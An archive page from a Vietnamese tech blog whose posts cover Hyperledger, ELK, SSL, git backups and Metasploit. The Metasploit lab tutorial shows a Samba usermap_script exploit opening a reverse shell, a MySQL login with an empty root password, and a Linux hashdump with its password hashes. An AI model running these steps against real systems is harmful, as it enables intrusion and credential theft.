khanhnnvn

Viết Web ứng dụng giao tiếp với Hyperledger Composer

 BlockChain  Comments Off on Viết Web ứng dụng giao tiếp với Hyperledger Composer
Jun 252018
 

Để tương tác với một business network, các ứng dụng có thể gọi đến các REST API. Để tạo một API cho một business network, bạn có thể dùng câu lệnh:

composer-rest-server

Để tạo một ứng dụng  Angular có thể giao tiếp với REST API, ta sử dụng lệnh

yo hyperledger-composer

Bạn có thể tham khảo  Developer Tutorial để biết chi tiết hơn về cách sử dụng lệnh composer-rest-server và các sinh ra một ứng dụng dùng Angular.

Để sinh một ứng dụng Angular từ một Business Network Archive (.BNA) chúng ta thực hiện theo các bước sau:

1. Khởi động Hyperledger Fabric trên máy tính cá nhân của bạ

Nếu bạn đã hoàn thành việc cài đặt môi trường thì Fabric đã được cài đặt trên máy tính của bạn. Bạn chỉ cần chuyển đến thư mục fabric-dev-servers và khởi động Hyperledger Fabric. Chúng ta thực hiện các câu lệnh sau:

cd ~/fabric-dev-servers
./startFabric.sh
./createPeerAdminCard.sh

Câu lện cuối sẽ tạo một PeerAdmin .card  nơi mà sẽ cần thiết để thay đổi mã nguồn chạy trên môi trường phát triển. Để thống ke các card đang dùng chúng ta sẽ có thể dùng lệnh:

composer card list

2. Chuẩn bị Hyperledger Fabric peers

Chúng ta sẽ tạo một dự án có tên là tutorial-network sẽ xuất hiện một ‘PeerAdmin’ card cho bạn..

composer network install --card PeerAdmin@hlfv1 --archiveFile tutorial-network@0.0.1.bna

3. Khởi động Business Network trên Hyperledger Fabric

Để khởi động tutorial-network BNA chúng ta dùng lệnh

composer network start --networkName tutorial-network --networkVersion 0.0.1 --networkAdmin admin --networkAdminEnrollSecret adminpw --card PeerAdmin@hlfv1

Câu lệnh trên sẽ tạo một tập tin có tên admin@tutorial-network.card

Bạn nên ghi nhớ tài khoản admin và mật khẩu adminpw 

4.Cuối cùng bạn sẽ sử dụng ‘admin’ card

Chúng ta sẽ sử dụng câu lệnh:

composer card import --file admin@tutorial-network.card

5. Khởi động REST server

Bạn chỉ cần chạy câu lệnh sau để khởi động API, sau khi chạy xong bạn cần khai báo các thông số

composer-rest-server

 • Bạn cần khai báo cardname trong ví dụ này là admin@tutorial-network
 • Bạn điền namespaces
 • Chọn No
 • Chọn Yes
 • Chọn No

Sau đó bạn sẽ truy cập API qua URL:  http://localhost:3000/explorer

6. Generate ứng dụng Angular

Bạn chạy lệnh sau

yo hyperledger-composer

Bạn điền các thông số sau

Welcome to the Hyperledger Composer project generator
? Please select the type of project: Angular
You can run this generator using: 'yo hyperledger-composer:angular'
Welcome to the Hyperledger Composer Angular project generator
? Do you want to connect to a running Business Network? Yes
? Project name: [insert]
? Description: Hyperledger Composer Angular project
? Author name: [insert]
? Author email: [insert]
? License: Apache-2.0
? Name of the Business Network card: admin@tutorial-network
? Do you want to generate a new REST API or connect to an existing REST API? Connect to an existing REST
 API
? REST server address: http://localhost
? REST server port: 3000
? Should namespaces be used in the generated REST API? Namespaces are not used
Created application!

Cuối cùng bạn chuyển đến thư mục ứng dụng vừa tạo ra và gõ lệnh

npm start

Bạn sẽ truy câp link http://localhost:4200

Giao diện sẽ như sau:

 

Khác nhau giữa Hyperledger Fabric và Composer

 BlockChain  Comments Off on Khác nhau giữa Hyperledger Fabric và Composer
Jun 122018
 

What is Hyperledger Fabric?

Hyperledger Fabric là một blockchain không công khai cung cấp nền tảng cho ứng dụng giao dịch của doanh nghiệp. HF cung cấp cơ sở hạ tầng cho một hệ thống Blockchain.

What is Hyperledger Composer?

Hyperledger Composer là một nền tảng cung cấp các giao tiếp nhằm mục đích phát triển ứng dụng một cách nhanh trong trên Hyperledger Fabric. HC hướng đến ứng dụng của Blockchain

Relationship between Fabric and Composer

Dưới đây là biểu đồ cho thấy mối quen hệ giữa Fabric và Composer framework.

Về cơ bản để phát triển ứng dụng bạn vấn cần xây dựng hệ thống HF hoặc sử dụng có sẵn, HC chỉ nhằm mục đích giúp các nhà phát triển dễ dàng triển khai ứng dụng của mình hơn.

Chi tiết về các chức năng, bạn tham khảo hình sau:

Metasploit: Scan một mạng lỗi ms17_010

 Pentest  Comments Off on Metasploit: Scan một mạng lỗi ms17_010
Jun 062018
 

Giới thiệu: Metasploit là một công cụ khá mạnh dành cho các chuyên giá đánh giá. Bài viết dưới đây giới thiệu cách quét một mạng máy tính với lỗi cụ thể.

 

Bước 1: Bạn cần kết nối metasploit với cơ sở dữ liệu:

msfdb init

Bước2: Bạn lệnh sau để scan một mạng, chỉ ra những host online

db_nmap 172.16.12.0/24 -PN

sau khi scan xong, danh sách các host như sau:

Bước 3: Thực hiện scan như sau:

Bạn chỉ cần chạy run sau đó sẽ được kết quả như hình sau:

Giờ bạn chỉ việc khai thác.

Chúc bạn thành công.

Using the Database in Metasploit

 Pentest  Comments Off on Using the Database in Metasploit
Jun 052018
 

Setup our Metasploit Database

In Kali, you will need to start up the postgresql server before using the database.

root@kali:~# systemctl start postgresql

After starting postgresql you need to create and initialize the msf database with msfdb init

root@kali:~# msfdb init
Creating database user 'msf'
Enter password for new role: 
Enter it again: 
Creating databases 'msf' and 'msf_test'
Creating configuration file in /usr/share/metasploit-framework/config/database.yml
Creating initial database schema

 

Using Workspaces in Metasploit

When we load up msfconsole, and run ‘db_status‘, we can confirm that Metasploit is successfully connected to the database.

msf > db_status 
[*] postgresql connected to msf

Seeing this capability is a meant to keep track of our activities and scans in order. It’s imperative we start off on the right foot. Once connected to the database, we can start organizing our different movements by using what are called ‘workspaces’. This gives us the ability to save different scans from different locations/networks/subnets for example.

Issuing the ‘workspace‘ command from the msfconsole, will display the currently selected workspaces. The ‘default‘ workspace is selected when connecting to the database, which is represented by the * beside its name.

msf > workspace
* default
 msfu
 lab1
 lab2
 lab3
 lab4
msf > 

As we can see this can be quite handy when it comes to keeping things ‘neat’. Let’s change the current workspace to ‘msfu’.

msf > workspace msfu
[*] Workspace: msfu
msf > workspace
 default
* msfu
 lab1
 lab2
 lab3
 lab4
msf > 

Creating and deleting a workspace one simply uses the ‘-a‘ or ‘-d‘ followed by the name at the msfconsole prompt.

msf > workspace -a lab4
[*] Added workspace: lab4
msf > 


msf > workspace -d lab4 
[*] Deleted workspace: lab4
msf > workspace

It’s that simple, using the same command and adding the ‘-h‘ switch will provide us with the command’s other capabilities.

 
msf > workspace -h
Usage:
  workspace         List workspaces
  workspace -v        List workspaces verbosely
  workspace [name]      Switch workspace
  workspace -a [name] ...  Add workspace(s)
  workspace -d [name] ...  Delete workspace(s)
  workspace -D        Delete all workspaces
  workspace -r   Rename workspace
  workspace -h        Show this help information

msf > 

From now on any scan or imports from 3rd party applications will be saved into this workspace.

Now that we are connected to our database and workspace setup, lets look at populating it with some data. First we’ll look at the different ‘db_’ commands available to use using the ‘help’ command from the msfconsole.

msf > help
...snip...

Database Backend Commands
=========================

  Command      Description
  -------      -----------
  creds       List all credentials in the database
  db_connect    Connect to an existing database
  db_disconnect   Disconnect from the current database instance
  db_export     Export a file containing the contents of the database
  db_import     Import a scan result file (filetype will be auto-detected)
  db_nmap      Executes nmap and records the output automatically
  db_rebuild_cache Rebuilds the database-stored module cache
  db_status     Show the current database status
  hosts       List all hosts in the database
  loot       List all loot in the database
  notes       List all notes in the database
  services     List all services in the database
  vulns       List all vulnerabilities in the database
  workspace     Switch between database workspaces

Importing and Scanning

There are several ways we can do this, from scanning a host or network directly from the console, or importing a file from an earlier scan. Let’s start by importing an nmap scan of the ‘metasploitable 2’ host. This is done using the ‘db_import‘ followed by the path to our file.

msf > db_import /root/msfu/nmapScan 
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Rex::Parser::NmapXMLStreamParser'
[*] Importing host 172.16.194.172
[*] Successfully imported /root/msfu/nmapScan
msf > hosts

Hosts
=====

address     mac        name os_name os_flavor os_sp purpose info comments
-------     ---        ---- ------- --------- ----- ------- ---- --------
172.16.194.172 00:0C:29:D1:62:80    Linux  Ubuntu      server     

msf > 

Once completed we can confirm the import by issuing the ‘hosts’ command. This will display all the hosts stored in our current workspace. We can also scan a host directly from the console using the ‘db_nmap’ command. Scan results will be saved in our current database. The command works the same way as the command line version of ‘nmap’

msf > db_nmap -A 172.16.194.134
[*] Nmap: Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-06-18 12:36 EDT
[*] Nmap: Nmap scan report for 172.16.194.134
[*] Nmap: Host is up (0.00031s latency).
[*] Nmap: Not shown: 994 closed ports
[*] Nmap: PORT   STATE SERVICE   VERSION
[*] Nmap: 80/tcp  open http     Apache httpd 2.2.17 ((Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 

...snip...

[*] Nmap: HOP RTT   ADDRESS
[*] Nmap: 1  0.31 ms 172.16.194.134
[*] Nmap: OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 14.91 seconds
msf >


msf > hosts

Hosts
=====

address     mac        name os_name      os_flavor os_sp purpose info comments
-------     ---        ---- -------      --------- ----- ------- ---- --------
172.16.194.134 00:0C:29:68:51:BB    Microsoft Windows XP        server     
172.16.194.172 00:0C:29:D1:62:80    Linux       Ubuntu      server     

msf > 

Backing Up Our Data

Exporting our data outside the Metasploit environment is very simple. Using the ‘db_export‘ command all our gathered information can be saved in a XML file. This format can be easily used and manipulated later for reporting purposes. The command has 2 outputs, the ‘xml‘ format which will export all of the information currently stored in our active workspace, and the ‘pwdump‘ format which exports everything related to used/gathered credentials.

msf > db_export -h
Usage:
  db_export -f [-a] [filename]
  Format can be one of: xml, pwdump
[-] No output file was specified

msf > db_export -f xml /root/msfu/Exported.xml
[*] Starting export of workspace msfu to /root/msfu/Exported.xml [ xml ]...
[*]   >> Starting export of report
[*]   >> Starting export of hosts
[*]   >> Starting export of events
[*]   >> Starting export of services
[*]   >> Starting export of credentials
[*]   >> Starting export of web sites
[*]   >> Starting export of web pages
[*]   >> Starting export of web forms
[*]   >> Starting export of web vulns
[*]   >> Finished export of report
[*] Finished export of workspace msfu to /root/msfu/Exported.xml [ xml ]...


Using the Hosts Command

Now that we can import and export information to and from our database, let us look at how we can use this information within the msfconsole. Many commands are available to search for specific information stored in our database. Hosts names, address, discovered services etc. We can even use the resulting data to populate module settings such as RHOSTS. We’ll look how this is done a bit later.

The ‘hosts‘ command was used earlier to confirm the presence of data in our database. Let’s look at the different options available and see how we use it to provide us with quick and useful information. Issuing the command with ‘-h’ will display the help menu.

msf > hosts -h
Usage: hosts [ options ] [addr1 addr2 ...]

OPTIONS:
 -a,--add     Add the hosts instead of searching
 -d,--delete    Delete the hosts instead of searching
 -c <col1,col2>  Only show the given columns (see list below)
 -h,--help     Show this help information
 -u,--up      Only show hosts which are up
 -o     Send output to a file in csv format
 -O    Order rows by specified column number
 -R,--rhosts    Set RHOSTS from the results of the search
 -S,--search    Search string to filter by
 -i,--info     Change the info of a host
 -n,--name     Change the name of a host
 -m,--comment   Change the comment of a host
 -t,--tag     Add or specify a tag to a range of hosts

Available columns: address, arch, comm, comments, created_at, cred_count, detected_arch, exploit_attempt_count, host_detail_count, info, mac, name, note_count, os_family, os_flavor, os_lang, os_name, os_sp, purpose, scope, service_count, state, updated_at, virtual_host, vuln_count, tags

We’ll start by asking the ‘hosts‘ command to display only the IP address and OS type using the ‘-c‘ switch.

msf > hosts -c address,os_flavor

Hosts
=====

address     os_flavor
-------     ---------
172.16.194.134 XP
172.16.194.172 Ubuntu

Setting up Modules

Another interesting feature available to us, is the ability to search all our entries for something specific. Imagine if we wished to find only the Linux based machines from our scan. For this we’d use the ‘-S‘ option. This option can be combined with our previous example and help fine tune our results.

msf > hosts -c address,os_flavor -S Linux

Hosts
=====

address     os_flavor
-------     ---------
172.16.194.172 Ubuntu

msf >

Using the output of our previous example, we’ll feed that into the ‘tcp’ scan auxiliary module.

msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

  Name     Current Setting Required Description
  ----     --------------- -------- -----------
  CONCURRENCY 10        yes    The number of concurrent ports to check per host
  FILTER            no    The filter string for capturing traffic
  INTERFACE           no    The name of the interface
  PCAPFILE           no    The name of the PCAP capture file to process
  PORTS    1-10000     yes    Ports to scan (e.g. 22-25,80,110-900)
  RHOSTS            yes    The target address range or CIDR identifier
  SNAPLEN   65535      yes    The number of bytes to capture
  THREADS   1        yes    The number of concurrent threads
  TIMEOUT   1000       yes    The socket connect timeout in milliseconds

We can see by default, nothing is set in ‘RHOSTS‘, we’ll add the ‘-R‘ switch to the hosts command and run the module. Hopefully it will run and scan our target without any problems.

msf auxiliary(tcp) > hosts -c address,os_flavor -S Linux -R

Hosts
=====

address     os_flavor
-------     ---------
172.16.194.172 Ubuntu

RHOSTS => 172.16.194.172

msf auxiliary(tcp) > run

[*] 172.16.194.172:25 - TCP OPEN
[*] 172.16.194.172:23 - TCP OPEN
[*] 172.16.194.172:22 - TCP OPEN
[*] 172.16.194.172:21 - TCP OPEN
[*] 172.16.194.172:53 - TCP OPEN
[*] 172.16.194.172:80 - TCP OPEN

...snip...

[*] 172.16.194.172:5432 - TCP OPEN
[*] 172.16.194.172:5900 - TCP OPEN
[*] 172.16.194.172:6000 - TCP OPEN
[*] 172.16.194.172:6667 - TCP OPEN
[*] 172.16.194.172:6697 - TCP OPEN
[*] 172.16.194.172:8009 - TCP OPEN
[*] 172.16.194.172:8180 - TCP OPEN
[*] 172.16.194.172:8787 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Of course this also works if our results contain more than one address.

msf auxiliary(tcp) > hosts -R

Hosts
=====

address     mac        name os_name      os_flavor os_sp purpose info comments
-------     ---        ---- -------      --------- ----- ------- ---- --------
172.16.194.134 00:0C:29:68:51:BB    Microsoft Windows XP        server     
172.16.194.172 00:0C:29:D1:62:80    Linux       Ubuntu      server     

RHOSTS => 172.16.194.134 172.16.194.172

msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

  Name     Current Setting        Required Description
  ----     ---------------        -------- -----------
  CONCURRENCY 10               yes    The number of concurrent ports to check per host
  FILTER                   no    The filter string for capturing traffic
  INTERFACE                  no    The name of the interface
  PCAPFILE                  no    The name of the PCAP capture file to process
  PORTS    1-10000            yes    Ports to scan (e.g. 22-25,80,110-900)
  RHOSTS    172.16.194.134 172.16.194.172 yes    The target address range or CIDR identifier
  SNAPLEN   65535             yes    The number of bytes to capture
  THREADS   1               yes    The number of concurrent threads
  TIMEOUT   1000              yes    The socket connect timeout in milliseconds

You can see how useful this may be if our database contained hundreds of entries. We could search for Windows machines only, then set the RHOSTS option for the smb_version auxiliary module very quickly. The set RHOSTS switch is available in almost all of the commands that interact with the database.

Services

Another way to search the database is by using the ‘services‘ command. Like the previous examples, we can extract very specific information with little effort.

 
msf > services -h

Usage: services [-h] [-u] [-a] [-r ] [-p >port1,port2>] [-s >name1,name2>] [-o ] [addr1 addr2 ...]

 -a,--add     Add the services instead of searching
 -d,--delete    Delete the services instead of searching
 -c <col1,col2>  Only show the given columns
 -h,--help     Show this help information
 -s <name1,name2> Search for a list of service names
 -p <port1,port2> Search for a list of ports
 -r   Only show [tcp|udp] services
 -u,--up      Only show services which are up
 -o     Send output to a file in csv format
 -R,--rhosts    Set RHOSTS from the results of the search
 -S,--search    Search string to filter by

Available columns: created_at, info, name, port, proto, state, updated_at

Much in the same way as the hosts command, we can specify which fields to be displayed. Coupled with the ‘-S‘ switch, we can also search for a service containing a particular string.

msf > services -c name,info 172.16.194.134

Services
========

host      name     info
----      ----     ----
172.16.194.134 http     Apache httpd 2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1 
172.16.194.134 msrpc     Microsoft Windows RPC 
172.16.194.134 netbios-ssn  
172.16.194.134 http     Apache httpd 2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1 
172.16.194.134 microsoft-ds Microsoft Windows XP microsoft-ds 
172.16.194.134 mysql 

Here we are searching all hosts contained in our database with a service name containing the string ‘http’.

msf > services -c name,info -S http

Services
========

host      name info
----      ---- ----
172.16.194.134 http Apache httpd 2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1 
172.16.194.134 http Apache httpd 2.2.17 (Win32) mod_ssl/2.2.17 OpenSSL/0.9.8o PHP/5.3.4 mod_perl/2.0.4 Perl/v5.10.1 
172.16.194.172 http Apache httpd 2.2.8 (Ubuntu) DAV/2 
172.16.194.172 http Apache Tomcat/Coyote JSP engine 1.1 

The combinations for searching are enormous. We can use specific ports, or port ranges. Full or partial service name when using the ‘-s’ or ‘-S’ switches. For all hosts or just a select few… The list goes on and on. Here are a few examples, but you may need to experiment with these features in order to get what you want and need out your searches.

msf > services -c info,name -p 445

Services
========

host      info                 name
----      ----                 ----
172.16.194.134 Microsoft Windows XP microsoft-ds   microsoft-ds
172.16.194.172 Samba smbd 3.X workgroup: WORKGROUP  netbios-ssn


msf > services -c port,proto,state -p 70-81
Services
========
host      port proto state
----      ---- ----- -----
172.16.194.134 80  tcp  open
172.16.194.172 75  tcp  closed
172.16.194.172 71  tcp  closed
172.16.194.172 72  tcp  closed
172.16.194.172 73  tcp  closed
172.16.194.172 74  tcp  closed
172.16.194.172 70  tcp  closed
172.16.194.172 76  tcp  closed
172.16.194.172 77  tcp  closed
172.16.194.172 78  tcp  closed
172.16.194.172 79  tcp  closed
172.16.194.172 80  tcp  open
172.16.194.172 81  tcp closed

msf > services -s http -c port 172.16.194.134
Services
========
host      port
----      ----
172.16.194.134 80
172.16.194.134 443

msf > services -S Unr
Services
========
host      port proto name state info
----      ---- ----- ---- ----- ----
172.16.194.172 6667 tcp  irc open Unreal ircd
172.16.194.172 6697 tcp  irc open Unreal ircd

CSV Export

Both the hosts and services commands give us a means of saving our query results into a file. The file format is a comma separated value, or CSV. Followed by the ‘-o’ with path and filename, the information that has been displayed on the screen at this point will now be saved to disk.

msf > services -s http -c port 172.16.194.134 -o /root/msfu/http.csv

[*] Wrote services to /root/msfu/http.csv

msf > hosts -S Linux -o /root/msfu/linux.csv
[*] Wrote hosts to /root/msfu/linux.csv

msf > cat /root/msfu/linux.csv
[*] exec: cat /root/msfu/linux.csv

address,mac,name,os_name,os_flavor,os_sp,purpose,info,comments
"172.16.194.172","00:0C:29:D1:62:80","","Linux","Debian","","server","",""

msf > cat /root/msfu/http.csv
[*] exec: cat /root/msfu/http.csv

host,port
"172.16.194.134","80"
"172.16.194.134","443"

Creds

The ‘creds’ command is used to manage found and used credentials for targets in our database. Running this command without any options will display currently saved credentials.

msf > creds

Credentials
===========

host port user pass type active?
---- ---- ---- ---- ---- -------

[*] Found 0 credentials.

As with ‘db_nmap‘ command, successful results relating to credentials will be automatically saved to our active workspace. Let’s run the auxiliary module ‘mysql_login‘ and see what happens when Metasploit scans our server.

msf auxiliary(mysql_login) > run

[*] 172.16.194.172:3306 MYSQL - Found remote MySQL version 5.0.51a
[*] 172.16.194.172:3306 MYSQL - [1/2] - Trying username:'root' with password:''
[*] 172.16.194.172:3306 - SUCCESSFUL LOGIN 'root' : ''
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


msf auxiliary(mysql_login) > creds 

Credentials
===========

host      port user pass type   active?
----      ---- ---- ---- ----   -------
172.16.194.172 3306 root    password true

[*] Found 1 credential.
msf auxiliary(mysql_login) >

We can see the module was able to connect to our mysql server, and because of this Metasploit saved the credentials in our database automatically for future reference.

During post-exploitation of a host, gathering user credentials is an important activity in order to further penetrate a target network. As we gather sets of credentials, we can add them to our database with the ‘creds -a’ command.

msf > creds -a 172.16.194.134 -p 445 -u Administrator -P 7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e:::
[*] Time: 2012-06-20 20:31:42 UTC Credential: host=172.16.194.134 port=445 proto=tcp sname= type=password user=Administrator pass=7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: active=true

msf > creds

Credentials
===========

host      port user      pass                                 type   active?
----      ---- ----      ----                                 ----   -------
172.16.194.134 445  Administrator 7bf4f254b222bb24aad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e::: password true

[*] Found 1 credential.


Loot

Once you’ve compromised a system (or three), one of the objective may be to retrieve hash dumps. From either a Windows or *nix system. In the event of a successful hash dump, this information will be stored in our database. We can view this dumps using the ‘loot’ command. As with almost every command, adding the ‘-h’ switch will display a little more information.

msf > loot -h
Usage: loot
 Info: loot [-h] [addr1 addr2 ...] [-t <type1,type2>]
 Add: loot -f [fname] -i [info] -a [addr1 addr2 ...] [-t [type]
 Del: loot -d [addr1 addr2 ...]

 -a,--add     Add loot to the list of addresses, instead of listing
 -d,--delete    Delete *all* loot matching host and type
 -f,--file     File with contents of the loot to add
 -i,--info     Info of the loot to add
 -t <type1,type2> Search for a list of types
 -h,--help     Show this help information
 -S,--search    Search string to filter by

Here’s an example of how one would populate the database with some ‘loot’.

msf exploit(usermap_script) > exploit

[*] Started reverse double handler
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo 4uGPYOrars5OojdL;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "4uGPYOrars5OojdL\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.194.163:4444 -> 172.16.194.172:55138) at 2012-06-27 19:38:54 -0400

^Z
Background session 1? [y/N] y

msf exploit(usermap_script) > use post/linux/gather/hashdump
msf post(hashdump) > show options

Module options (post/linux/gather/hashdump):

  Name   Current Setting Required Description
  ----   --------------- -------- -----------
  SESSION 1        yes    The session to run this module on.

msf post(hashdump) > sessions -l

Active sessions
===============

 Id Type    Information Connection
 -- ----    ----------- ----------
 1  shell unix        172.16.194.163:4444 -> 172.16.194.172:55138 (172.16.194.172)

msf post(hashdump) > run

[+] root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:0:0:root:/root:/bin/bash
[+] sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:3:3:sys:/dev:/bin/sh
[+] klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:103:104::/home/klog:/bin/false
[+] msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
[+] postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
[+] user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:1001:1001:just a user,111,,:/home/user:/bin/bash
[+] service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:1002:1002:,,,:/home/service:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.hashes_264208.txt
[*] Post module execution completedmsf post(hashdump) > loot

Loot
====

host      service type     name          content   info              path
----      ------- ----     ----          -------   ----              ----
172.16.194.172      linux.hashes unshadowed_passwd.pwd text/plain Linux Unshadowed Password File /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.hashes_264208.txt
172.16.194.172      linux.passwd passwd.tx       text/plain Linux Passwd File        /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.passwd_953644.txt
172.16.194.172      linux.shadow shadow.tx       text/plain Linux Password Shadow File   /root/.msf4/loot/20120627193921_msfu_172.16.194.172_linux.shadow_492948.txt

Install Elasticsearch, Logstash, and Kibana (ELK Stack) on CentOS/RHEL 7

 Uncategorized  Comments Off on Install Elasticsearch, Logstash, and Kibana (ELK Stack) on CentOS/RHEL 7
May 052018
 
rpm --import https://artifacts.elastic.co/GPG-KEY-elasticsearch

/etc/yum.repos.d/elasticsearch.repo

[elasticsearch-6.x]
name=Elasticsearch repository for 6.x packages
baseurl=https://artifacts.elastic.co/packages/6.x/yum
gpgcheck=1
gpgkey=https://artifacts.elastic.co/GPG-KEY-elasticsearch
enabled=1
autorefresh=1
type=rpm-md

yum install elasticsearch

config 
curl -X GET http://localhost:9200

Logstash

rpm --import https://artifacts.elastic.co/GPG-KEY-elasticsearch

cat << EOF > /etc/yum.repos.d/logstash.repo
[logstash-6.x]
name=Elastic repository for 6.x packages
baseurl=https://artifacts.elastic.co/packages/6.x/yum
gpgcheck=1
gpgkey=https://artifacts.elastic.co/GPG-KEY-elasticsearch
enabled=1
autorefresh=1
type=rpm-md
EOF
yum install logstash

Install Kibana 

rpm --import https://artifacts.elastic.co/GPG-KEY-elasticsearch

cat <<EOF > /etc/yum.repos.d/kibana.repo
[kibana-6.x]
name=Kibana repository for 6.x packages
baseurl=https://artifacts.elastic.co/packages/6.x/yum
gpgcheck=1
gpgkey=https://artifacts.elastic.co/GPG-KEY-elasticsearch
enabled=1
autorefresh=1
type=rpm-md
EOF

yum install kibana

		

Tự động backup dữ liệu, mã nguồn lên git

 Linux  Comments Off on Tự động backup dữ liệu, mã nguồn lên git
Feb 022018
 

Chào các bạn,

Công việc hàng ngày backup cơ sở dữ liệu, mã nguồn khá mất công. Tôi thử viết một đoạn sau để thực hiện backup dữ liệu mã mã nguồn của tôi lên git. Các bạn tham khảo đoạn code sau:

#!/bin/bash

# Database credentials
user=”asianux_user”
password=”asianux”
host=”localhost”
db_name=”db”

# Other options
backup_path=”/home/asianux/db”
date=$(date +”%d-%b-%Y”)

# Set default file permissions
umask 177

# Dump database into SQL file
mysqldump –user=$user –password=$password –host=$host $db_name > $backup_path/$db_name-$date.sql

# Delete files older than 30 days
find $backup_path/* -mtime +30 -exec rm {} \;

# Push to git backup code and db
sleep 10
cd /var/asianux
git add .
git commit -m “Auto Commit Asianux”
git push origin master
echo “Backup code and db finish! Goodluck”

Sau đó bạn thiết lập chạy crontab để chạy tự động.

Blockchain là gì?

 BlockChain  Comments Off on Blockchain là gì?
Feb 022018
 

1. Mô hình tính toán mạng lưới, tổ chức kiểu phi tập trung, các nút mạng nối nhau từng nhóm
2. Với dữ liệu ghi chép kiểu sổ cái, lưu phân tán, đồng bộ liên tục nhờ cơ chế đồng thuận
3. Được đảm bảo an ninh bằng hàm băm mật mã, chữ ký số và cấu trúc lưu trữ móc xích các khối dữ liệu.

. Blockchain có tính chất không thể đảo ngược vì dữ liệu chỉ ghi thêm mà không sửa, không xoá.

. Blockchain có tính bền vững cao về dữ liệu lưu, khi số nút mạng đủ nhiều và liên tục bổ sung.

. Blockchain luôn online, luôn sẵn sàng vì các node gần như không bao giờ tắt đồng thời. Hệ thống có nhiều điểm truy cập, không có nút cổ chai.

. Blockchain có tính minh bạch cao vì dữ liệu lưu khắp nơi và bất kỳ nút mạng nào cũng có thể xem toàn bộ sổ.

. Blockchain khó bị tấn công nhờ:

1. Sử dụng chữ ký số bảo vệ giao dịch
=> không thể giả mạo hay sửa đổi giao dịch.

2. Sử dụng các cơ chế lưu trữ kiểu móc xích
=> đảo ngược dữ liệu là bất khả thi

3. Đòi hỏi TỐN TÀI NGUYÊN trong quá trình tạo các khối dữ liệu block. (PoW, PoS, PoI, PoA)
=> chi phí tấn công là quá lớn và độ khó kỹ thuật quá cao.

. Blockchain dễ bị quá tải nếu số nút mạng chưa đủ nhiều hoặc lượng dữ liệu cần đồng bộ trên mỗi giao dịch lớn.

. Blockchain có thể bị chi phối, điều khiển tập trung nếu có một bên nào đó giữ quyền cấp phép tham gia mạng hoặc sở hữu phần lớn tài nguyên tính toán trên mạng.

. Vì có nhiều nút nối mạng, tốc độ đồng bộ thông tin các nút mạng quyết định tốc độ blockchain. Mỗi giao dịch thường cần tối thiểu vài phút để nó được lan toả toàn mạng và xác nhận.

. Quá tải và băng thông thấp là hiệu ứng sẽ xảy ra trên blockchain khi số giao dịch thực hiện đồng thời và số nút mạng cần đồng bộ/đồng thuận đủ lớn.

Hướng dẫn triển khai SSL GlobalSign trên Apache – CentOS

 Hệ thống  Comments Off on Hướng dẫn triển khai SSL GlobalSign trên Apache – CentOS
Jan 312018
 

Bước 1: Cài đặt các gói cần thiết:

yum install mod_ssl

Bước 2: Bạn sinh ra 2 file csr và key

openssl req -new -newkey rsa:2048 -nodes -out asianux.csr -keyout asianux.key -subj “/C=VN/ST=Hanoi/L=Hanoi/O=Asianux/OU=IT/CN=asianux.org.vn”

Bước 3: Bạn gửi file csr cho hỗ trợ phía GlobalSign, bạn sẽ nhận được các file chứng chỉ.

Bước 4: Thiết lập Apache với các chứng chỉ đã có, ví dụ file cấu hình như sau:

<VirtualHost *:443>
DocumentRoot /var/www/html/asianux/html
ServerName asianux.org.vn
SSLEngine on
SSLCertificateFile /etc/httpd/ssl/asianux.cer
SSLCertificateKeyFile /etc/httpd/ssl/asianux.key
SSLCACertificateFile /etc/httpd/ssl/AV_intermediate.cer
</VirtualHost>

Chúc bạn thành công.

Hướng dẫn sử dụng SSH KEY + bitbucket

 Programing  Comments Off on Hướng dẫn sử dụng SSH KEY + bitbucket
Jan 302018
 

Bước 1: Sinh key trên máy chứa mã nguồn mà bạn muốn backup

ssh-keygen -t rsa -b 4096 -C “khanhnnvn@gmail.com”

Bước 2: Key sẽ lưu ở đường dẫn mặc định: /root/.ssh/id_rsa.pub

bạn kiểm tra key bằng lệnh: cat  /root/.ssh/id_rsa.pub

Bước 3: Bạn copy key vào tài khoản bitbucket như hình dưới đây.

Bạn dùng lệnh ssh -T git@bitbucket.org để kiểm tra việc kết nối.

Bước 4: Thay đổi url source từ http sang ssh bằng lệnh:

git remote set-url origin git@bitbucket.org:tai_khoan/ma_nguon.git

kiểm tra:

git remote -v

